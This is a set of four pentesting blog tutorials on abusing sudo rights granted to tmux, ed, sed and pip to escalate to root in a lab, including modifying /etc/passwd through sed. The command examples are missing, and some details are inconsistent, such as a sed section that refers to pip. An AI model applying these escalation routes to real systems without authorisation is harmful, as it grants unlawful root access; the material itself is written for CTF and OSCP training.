Linux For Pentester: tmux Privilege Escalation

In this article, we are going to describe “tmux” which is also known as a terminal multiplexer.  It allows multiple terminal sessions to be retrieved concurrently in a single window. It is useful for running more than one command-line program at the same time.

NOTE: “The main objective of publishing the series of “Linux for pentester” is to introduce the circumstances and any kind of hurdles that can be faced by any pentester while solving CTF challenges or OSCP labs which are based on Linux privilege escalations. Here we do not criticize any kind of misconfiguration that a network or system administrator does for providing higher permissions on any programs/binaries/files & etc.” 

Table of Content

  • What is tmux
  • How to use tmux
  • tmux framework
  • tmux commands
  • Assigning Sudo rights
  • Exploiting Sudo rights

What is tmux?: tmux is also known as a terminal multiplexer which creates a host server on your Linode and connects to it with a client window. If the client is disconnected, the server keeps running and as you reconnect to your Linode after rebooting your computer, you can reattach to the tmux session and the files you were working with will still be open.

In other words, we can also say that this is a tool by the help of which we can open multiple windows and split views (called “panes” in tmux lingo) within one terminal window.

How to use tmuxAlike other tmux also supports many commands to perform its function. Now we will describe each of its major operations one by one.

It can be attained by entering a key combination called the prefix and then typing a letter. There are many letters that are assigned to tmux for performing its task.

tmux framework: The entire operations that a tmux does can be easily understood by its hierarchical structure as shown below.

tmux commands: There are list of command that can help while working with tmux. Here in this article, we are running the major operation that can be performed by the help of tmux.

Very first we will start from its help command. For this we need to write “–help” on our kali terminal as shown below.

The tmux operations are categorized into 3 selection which I have described above in its framework. So now we will start from first step i.e “sessions”

Operate tmux Sessions: Sometimes even multiple windows and panes aren’t enough and you need to separate the layouts logically by grouping them into separate sessions.

Sessions are useful for completely separating work environments.

There are many operations for the session using tmux which is shown in below image but I’m describing few of them.

  • Create a new session: To create a new session we will frame command as shown in the below image.

In the above command “-s” is used as an argument for a new session and “Ignite” is the name of the new session that I want to create.

On framing above command tmux will create a new session by the name of Ignite which will highlight at the bottom of terminal. Similarly, one can create multiple session by a different name as per need.

  • To list all created session: once we have done with creating all session as per desire then we can check it by command as:

This will list all session as output that have been created. In below image tmux has listed all session which I have created by following the same procedure as above.

Operate tmux Window: When a tmux session starts, a single-window is fashioned by default but tmux also supports a utility to attach multiple windows to the same session and we can switch between them as needed. This can be supportive when you want to run numerous jobs in parallel.

Apart from creating multiple windows it also possesses many operations like rename any window, switch between window and many others.

At the initial phase, it shows “0: bash*” by default in which 0 represents the index value of window bash is the window name which can be renamed as per need * denotes the working location and when we create new window tmux highlights all window at the bottom of the terminal.

Note: We know that working of tmux is done with joining prefix with any letter as per requirement. Find the below table to understand it clearly.

In this article, I have created 5 windows as shown in the below image. We know that working of tmux is done with joining prefix with any letter as per requirement.

  • Create new window: For creating a new window we will use “-c” with the prefix (ctrl-b).

This will create a new window. You can use the same procedure for creating multiple windows as below image.

  • Rename window: by default, tmux mention the window name as “bash” but we can also change it as per our wish. Here I’m renaming my last window as shown below.

  • To switch window: we can also switch within multiple windows that help to provide the platform of working parallel. It can be done in many ways.

  • To display summary: To see the entire summary for whatever we have done till now we will use tmux option as:

Operate tmux Panes: By the help of tmux, we can divide each window into multiple panes. This is useful when you want outputs from multiple processes visible within a single window.

In this we have many options such as divide window into vertical, horizontal, rotating panes, switching to different panes. Now we will check each of this one by one.

Note: use below table for your reference

Here I have divided my window into 2 panes vertically by the command as:

In the below image, I have further sub-divide my window horizontally.

Suppose we have multiple panes containing some of the information in each and we want to rotate our panes if we desire. Then will follow the step as:

On framing above command tmux will simply move the current pane to left.

Assigning Sudo Rights

Sudo right is a type of permission that allows users to execute a file with super user permissions. Now we will start to perform privilege escalation for “tmux”. For doing so we need to set up our lab of tmux command with administrative rights. After that, we will check for the “tmux command” that what effect it has after getting sudo rights.

After that, we will give Sudo permission on tmux so that a local user can take the privilege of tmux as the root user.

Hence type following for enabling Sudo:

It can be clearly understood by the below image in which I have created a local user (test). To add sudo right open /sudoers file and type following as user Privilege specification.

Exploiting Sudo rights

Now we will start exploiting tmux service by taking the privilege of sudoer’s permission. For this, we need sessions of the victim’s machine that will assist us to have local user access of the targeted system through which we can escalate the root user rights.

Very first we will connect to the target machine with ssh, therefore, type following command to get access through local user login.

Then we will look for sudo right of “test” user (if given) and found that user “test” can execute the tmux command as “root” without a password.

Now after knowing the fact that test user attains sudo rights so, taking this benefit here, we can use tmux command to escalate the privileges of the test user.

Conclusion: This will launch a new terminal with root privilege shell.

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer, she is completely enthusiastic pentester and Security Analyst at Ignite Technologies. Contact Here

Linux for Pentester: ed Privilege Escalation

Here in this article, we are going to introduce a line-oriented text editor command i.e. “ed” which is used to generate, display, alter and operate text files. All ed commands operate on whole lines or ranges of lines; e.g., the “d” command deletes lines; the “m” command moves lines, “t” command copy the lines and so on, therefore, now we will check that how we can successfully execute our task of Privilege Escalation by accomplishing all these significant of “ed” command.

Table of Content

Overview to ed                               

  • Summary to ed
  • Primary Action attained using ed

Abusing ed

  • SUDO Lab setups for privilege Escalation
  • Exploiting SUDO

Summary to ed

ed command in Linux is used for initiation of the “ed text editor” which is a line-based text editor. Its minimal interface tendency makes it less complex for working on text files. It helps user to perform many operations like creating, editing, displaying and manipulating the files.

Editing is done in two distinct modes: “command and input”. In the “command” mode “ed” reads command from the standard input and execute to manipulate the contents of the editor buffer whereas when an input command, such as ‘m’ (move), ‘d’ (delete), ‘t’ (copy) or ‘c’ (change), is given, ed enters for its “input mode”.

It is the oldest editor which was developed in 1969 in the UNIX and is succeeded by vi and emacs text editor.

Now type its help command to know more about “ed”.

Fundamental activities achieved by “ed”: As we know “ed” does many operations so now we will go through to its entire functionality one by one.

Initializing file with ed: At the initial phase, the terminal space will seem to be like as below image when the command is run . By default, the editor creates an empty buffer to write, similar to the way any other command-line based editor works when you invoke it without a file name.

Now we will start to create a text file that contains some text within it. For doing so very first we will press ‘a’ before entering anything to the file and once we accomplished our task of writing we will enter a period (.) to signify this to the editor.

Note: The main thing that needs to remember is to use ‘a’ (initial) and ‘.’ (Final) as the ways to enter and exit the insert mode. Now, to save the buffer in a file, use ‘w’ followed by a file name of own choice which helps to save the file by the desired name as well as will also display the total no. of bytes that a file contains, and then ‘q’ to quit the editor.

For the confirmation of your created file i.e. whether it has been created or not you can recheck it by using “cat” command.

Edit the file with ed: Now, in case you need to edit the same file again, then it can simply be done by passing the name of the file as an argument to the ed command, and then following the same procedure as discussed above.

Here in the below image, I’m adding one more line to my file “info.txt” which I have created above by following the same process.

Note Every time we need to use ‘a’, ‘.’, ‘w’, ‘q’ command whenever we use any option of ed command.

Change any specific line: Till now we have learnt basic editing using ed, now let’s move ahead to discuss more editing aspects by using ed. For example, if we want to make changes in a specific line then how we can attain that operation using ed.

Here in the below image, it has been shown how we can print any particular line using argument ‘p’ and ‘n’

When we type ‘p’ it gives us the current line at which the control is currently, while on using ‘n’ it gives us the line number as well.

So after typing ‘n’ we simply need to mention that line no. for which we want alteration. By default ‘n’ displays the last line of the file so after that you can type the line no. as per your search.

Once you achieved the line where you want to make a change, then you can enter ‘c’ to change that line by typing the text again. For example, I have changed the 5th line which is the last line of my file, by adding some more detail to it. To recheck my modification I have read my file by using ‘cat’ command and will save the file by following the same process.

Display error message by the use of ed: When you type something which ed can’t understand, it displays a question mark (?) by default. To know more about where you have mistaken ed provides a very helpful option i.e. ‘h’.

As from below screenshot it can be clearly understood that when I have used ‘b’ option it gave me (?) which is the symbol of error and while typing ‘h’ ed has displayed the error message as an unknown command for option ‘b’.

Copy and move operation by ed: Apart from all above discussed function ed also gives the option for copy and paste a line at some other location, in this case, we use ’t’ command to copy the line and ‘m’ to move any line. You need to precede’t’ with the line number to which you want to copy and append the destination line number. For example, as in the below image, I have copied the 5th line to position 0 and will save changes.

In above-mentioned command 5 is representing to the line which needs to copy and 0 is representing to the line no. for where it needs to be copied.

Note: One can also use’ instead of ‘t’ if he/she wants to move the line to another place.

Search operation using ed: Searching for any line by its keyword can be easily done by ed.  For doing so first we will use “-p%” followed by ed which will prompt you further for your search mission. After that to search forward, enter/followed by the search keyword. The moment at which you press enter, the editor will display the first line (containing the keyword) it encounters. You can run that command again to continue searching.

Here in below image ed has printed only those line as output which consists search keywords i.e. misconfiguration and Linux.

Exploiting ed

Sudo Rights Lab setups for Privilege Escalation

Now we will start to perform privilege escalation for “ed”. For doing so we need to set up our lab of ed command with administrative rights. After that, we will check for the “ed command” that what effect it has after getting sudo rights and how we can use it more for privilege escalation.

It can be clearly understood by the below image in which I have created a local user (test) who own all sudo rights as root.

To add sudo right open /sudoers file and type following as user Privilege specification.

Exploiting Sudo rights

Now we will start exploiting ed service by taking the privilege of sudoer’s permission. For this, we need sessions of the victim’s machine that will assist us to have local user access of the targeted system through which we can escalate the root user rights.

Very first we will connect to the target machine with ssh, therefore, type following command to get access through local user login.

Then we look for sudo right of “test” user (if given) and found that user “test” can execute the ed command as “root” without a password.

Now after knowing the fact that test user attains sudo rights so, taking this benefit here we can use ed command to access empty buffer to call bash/sh shell, with higher privileges if permitted on sudo.

Conclusion: Hence we have efficaciously exploited “ed” by attaining its functionality after granting higher privilege.  

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer, she is completely enthusiastic pentester and Security Analyst at Ignite Technologies. Contact Here

Linux for Pentester: sed Privilege Escalation

This article will take our readers through all about Stream Editor (Sed), which is one of the most prominent text-processing services on GNU/Linux. In this article, we came with the brief introductory guide to sed which supports the main concern that how sed works and how we can accomplish its supplementary practice in the operation of Privilege Escalation.

NOTE: “The main objective of publishing the series of “Linux for pentester” is to introduce the circumstances and any kind of hurdles that can be faced by any pentester while solving CTF challenges or OSCP labs which are based on Linux privilege escalations. Here we do not criticize any kind of misconfiguration that a network or system administrator does for providing higher permissions on any programs/binaries/files & etc.”

Table of Content

Overview of sed                                            

  • Summary to sed
  • Chief Action achieved using sed
    • Replacement with the sed command
    • Printing and viewing from sed command
    • Deleting lines with sed

Abusing sed

  • SUDO Lab setups for privilege Escalation
  • Exploiting SUDO

Summary to sed

SED command in LINUX/UNIX stands for “stream editor” that can implement lots of purpose on file like, searching, find and replace, insertion or deletion. However, the most common use of SED command is for exchange or for discover and swap. By using SED you can edit files even without opening it, which is a much faster technique to find and replace something in the file. It is a powerful text stream editor which can do insertion, deletion, search etc. for any file as per user requirements. This command also supports regular expression that allows it to perform complex pattern matching too. Now to know further about the “sed” command we will start from its help option.

Note:It’s worth remarking that this article omits several commands, as our main concern is to reach about the “sed” influence over Privilege Escalation.

Key actions achieved by “sed”

  • Replacement with the sed command: As we know the “sed” performs many tasks that include insertion, deletion, modification and so on for any file as per user request so now we will start our journey to explore the entire utility of sed one by one.

1.1 Substituting or switching string: “sed” is used to replace or swap the string so whenever we need to exchange any string within a file then we will frame command as:

In the above command “s” denotes the substitution action. The “Ignite” is the hunt pattern and the “Egnyte” is the replacement string. By default, the sed command replaces the first incidence of the pattern in each line and it won’t replace the second, third…occurrence in the line.

1.2 Substituting the nth existence in a line: When we want to replace nth occurrence i.e. first, second and so on the existence of a pattern in a line then we will use the /1, /2 etc flags to mention the nth term.

Here I’m swapping for 2nd occurrence in each line.

1.3 Substituting all the existence at a time: As we know by default the sed command replaces the first incidence of the pattern in each line so if we wish to replace all occurrence simultaneously within a file then we can use flag “/g” for this purpose.

1.4 Substituting from nth occurrence to all existences: When we use “/g” this will make change globally to the entire file so if we want to make this swapping from a specific place then we need to mention that value(nth) from where we want to make changes.

On framing the above command it will replace all the patterns from the nth occurrence globally.

Note: In the below image you can’t see any changes for flag “3g” as my file doesn’t contain any 3rd occurrence of the replaced word but whenever there is the existence of substituted word at multiple times within a line then you can clearly see the changes that how its change globally from nth term.

1.5 Substituting the existence for a particular range:  We can limit the sed command to replace the string for a particular range. This can be achieved by framing command as shown below.

On framing this command the “sed” will replace “Ignite” starting from the first line to the third line.

Note:  One can use “$” in place of end index if we want substitute from nth term to the last line in the file.

  • Printing and viewing from sed command: Apart from substituting the string sed can help in printing and viewing a file as per user’s instruction.

2.1 Replicating the replaced line with /p flag: If we want to make duplication for replaced line then we can use the “/p” flag which prints the replaced line twice on the terminal. If a line does not have the search pattern and is not replaced, then it will print that line only once.

2.2 Printing only the replaced lines: If a user wants to print only those lines which are substituted then he can use “-n” option following by print command as shown below.

As from below image it can be cleared that on using “-n” the print flag has printed all the replaced line as output.

2.3 Printing lines by numbering it: This command is similar to “cat” in which we use “-n” for numbering the line for any file, same we can achieve from sed command too by framing the command as below.

On drawing the above command sed will print the output by numbering each line as per user request.

2.4 Display a file from x to y range: If we want to view a file from an instance i.e. for a range of starting index to end index then we write command as:

If we use “d” instead of “p” then sed will View the entire file except for the given range.

2.5 Print nth line of the file: Inplace of fixing end index you can also leave it blank if you wish to print only a specific line.

As in below screenshot, you can see when I have used above-mentioned command then sed has reflected the output only to print for the 4th line.

2.6 Print from nth line to end of file: To print any file from its nth line to the last (end of file) line then frame command as below:

Here “$” is an indication for reflecting the last line of the file.

2.7 Print the line only for pattern matching: If we want to print only those lines which match the given pattern then, in this case, we will draw command as:

From the below image, it is clear how this command works. Here in the below image, I have print those lines which include the word “training”.

2.8 Print lines which matches the pattern nth line: We can use numeric value along “p” to print for pattern matching till nth line.

3 Deleting lines with sed: Now we check how we can delete the lines from a file by the help of sed.

 3.1 Remove a specific line: To delete any particular line within a file us “d” option followed by sed command. Here I’m deleting the 3rd line from “Ignite.txt”.

3.2 Remove line for a range: If we wish to delete content till a particular range then we will set its “initial index value” and “end value” of file. In below image, I have deleted the content of “Ignite.txt” from its 3rd line to 5th line and will attain output for remaining file content.

3.3 Remove from nth to last line: Instead of fixing end index one can also use “$” to delete lines till the end of the file.

Here “2” indicating for the initial index from where deletion must be done and “$” is indicating to delete lines till the end of the file.

3.4 Remove the last line: If we won’t set any index value then “$d” will simply delete only the last line of the file.

3.5 Remove the pattern matching line: Sometimes we not only want to print or view those lines that match the particular pattern but also desire to delete them so in such case we will frame below command to attain output as per user request.

Here in below image sed has deleted all those lines which match the word “training”.

Abusing sed

Sudo Rights Lab setups for Privilege Escalation

Now we will start our mission of privilege escalation. To grab this first, we have to set up our lab of sed command with administrative rights. After that, we will check for the sed command that what impact it has after getting sudo rights and how we can use it more for privilege escalation.

It can be clearly understood by the below image in which I have created a local user (test) who own all sudo rights as root and can achieve all task as admin.

To add sudo right open etc/sudoers file and type following as user Privilege specification.

Exploiting Sudo rights

Now we will start exploiting sed facility by taking the privilege of sudoer’s permission. For this very first we must have sessions of a victim’s machine then only we can execute this task. Suppose we got the sessions of victim’s machine that will assist us to have local user access of the targeted system through which we can escalate the root user rights.

So now we will connect to the target machine with ssh, therefore, type following command to get access through local user login.

Then we look for sudo right of “test” user (if given) and found that user “test” can execute the pip command as “root” without a password.

Now we will access our /etc/passwd file by the help sed command to escalate or maintain access with elevated privileges.

Conclusion: Hence we have successfully exploited “sed” by achieving its functionality after granting higher privilege. 

Reference link: https://gtfobins.github.io

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer, she is completely enthusiastic pentester and Security Analyst at Ignite Technologies. Contact Here

Linux for Pentester: pip Privilege Escalation

The main objective of this article is to make attentive our readers for the other most expedient command from the list of Linux for pentesters. As we know apart from copying, downloading and searching task user desires other excessive operational mission i.e. installation of packages. So in this article, we are going to make you familiar with the command that can perform such task i.e. “pip”. The main utilities of this command are to install, uninstall, search python packages. So by knowing this functionality of pip command now, we will check how we can acquire its benefit in our mission of Privilege Escalation.

NOTE: “The main objective of publishing the series of “Linux for pentester” is to introduce the circumstances and any kind of hurdles that can be faced by any pentester while solving CTF challenges or OSCP labs which are based on Linux privilege escalations. Here we do not criticizing any kind of misconfiguration that a network or system administrator does for providing higher permissions on any programs/binaries/files & etc.”  

Table of Content

Introduction to pip                                        

  • Major Operation performed using pip

Exploiting pip

  • SUID Lab setups for privilege Escalation
  • Exploiting SUID

Introduction to pip

Before we start, let’s do a quick appendix check and determine what a ‘Python package’ is in actually. It is a Python module which can contain other modules or recursively, other packages. It is the kind of Python package that you import in your Python code. So there are many tools available that help to install such packages and “pip” is one of that which is widely used in today’s era.

The pip is an abbreviation of “python install packages” which is a tool for installing and managing Python packages. This command is very useful for web development as well as for sys-admins who manages cloud computing-based resources. Now we will start by running its help command to know the depth of “pip” operations.

Major operations performed by “pip”

List all installed packages: To check the list of all installed python packages in our machine we can use option “list” followed by pip command. The list option has its vital role in pip command as it can perform many operations that a user can need. Some of these functions are listed below:

  • List installed packages: This will help in listing all the installed packages.

Other option for package listing:

Syntax: pip list  <options>

List outdated packages: Whenever we wish to check the list for all those packages that are outdated then we will use “–outdated” option followed by pip list command which will provide the list of all installed outdated packages with its current and latest version.

List installed packages with column formatting: If we want to display the desired output in the specific format then we will use the “–format” option for this purpose. Suppose I want to wish to list the details in column format then I will frame command as below.

List outdated packages with column formatting: This is same as format option consisting some more fields to display the output as the current version, latest version, and type of installed packages.

List packages that are not dependencies of other packages: whenever anybody required to check the list for those installed packages who do not have any kind of responsibleness of other packages then we will frame command as below.

To install the new package: As above I have described the main objective of pip command is “installing new packages” so now by grabbing this advantage I am installing ‘flask”.

Syntax: pip install <package name>

Show information about packages: The “show” option in pip assist to reflects the detailed information about installed packages.

Syntax: pip show <package name>

As from below image it can be well understood that after using show option it has produced the output by showing the relevant information of flask.

To uninstall any package: Apart from installing the software packages we also required its other phase i.e. uninstallation. The pip command tends this utility too where one can uninstall the desired packages without any hassle.

Syntax: pip uninstall <package name>

Here in the below image, I’m showing to uninstall “jinja2” which is a modern-day templating language for Python developers.

To freeze any package:  Freezing is a procedure where pip reads the versions of all installed packages in a local virtual atmosphere and then produces a text file with the package version for each python package stated. For performing this operation use option “freeze” as shown below.

Syntax: pip freeze > <filename>

To search for an installed package: The search option helps to search for an available Python package. The search term generates quite a widespread group of packages.

Syntax: pip search <package name>

Most of the time, we wish to hunt for packages directly on the PyPI website. So PyPI delivers such search abilities for its index and a way to filter results.  Now I’m framing command as shown below to search for “keyring”.

To create a hash for any package: A Hash Value is a string value of specific length which is the result of calculation of a Hashing Algorithm. One of the chief uses of Hash Values is to define the Integrity of any Data (which can be a file, attachments, downloads etc).

Syntax: pip hash <package name>

The pip provides this functionality too to maintain the integrity of installed packages. In below image, I’m using this option for creating hash value of a file i.e. “rockyou.txt.

To download any file or package: Instead of above all described task “pip” also supports the functionality to upload, download, read etc. for any file. Here I’m using one of these i.e. download the package. Pip download use to download file and package into default path or can do the same for a specific path.

In below image I have used this to download a compressed file from remote location.

Syntax: pip download <path>

Exploiting pip

Sudo Rights Lab setups for Privilege Escalation

Now we will start our task of privilege escalation. For this very first we have to set up our lab of pip command with administrative rights. After that we will check for the pip command that what influence it has after getting sudo rights and how we can use it more for privilege escalation.

It can be clearly understood by the below image in which I have created a local user (test) who own all sudo rights as root and can achieve all task as admin.

To add sudo right open etc/sudoers file and type following as user Privilege specification.

Exploiting Sudo rights

Now we will start exploiting pip service by taking the privilege of sudoer’s permission. Suppose we got the sessions of victim’s machine that will assist us to have local user access of the targeted system through which we can escalate the root user rights.

Very first we will connect to the target machine with ssh, therefore, type following command to get access through local user login.

Then we look for sudo right of “test” user (if given) and found that user “test” can execute the pip command as “root” without a password.

Now after knowing the fact that test user attains admin rights so, taking this benefit here we can use pip command to run in privileged context and can be used to access the file system, escalate or maintain access with higher privileges if permitted on sudo.

Conclusion: Hence we have successfully exploited pip by achieving its functionality after granting higher privilege.  

Reference link: https://gtfobins.github.io

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer, she is completely enthusiastic pentester and Security Analyst at Ignite Technologies. Contact Here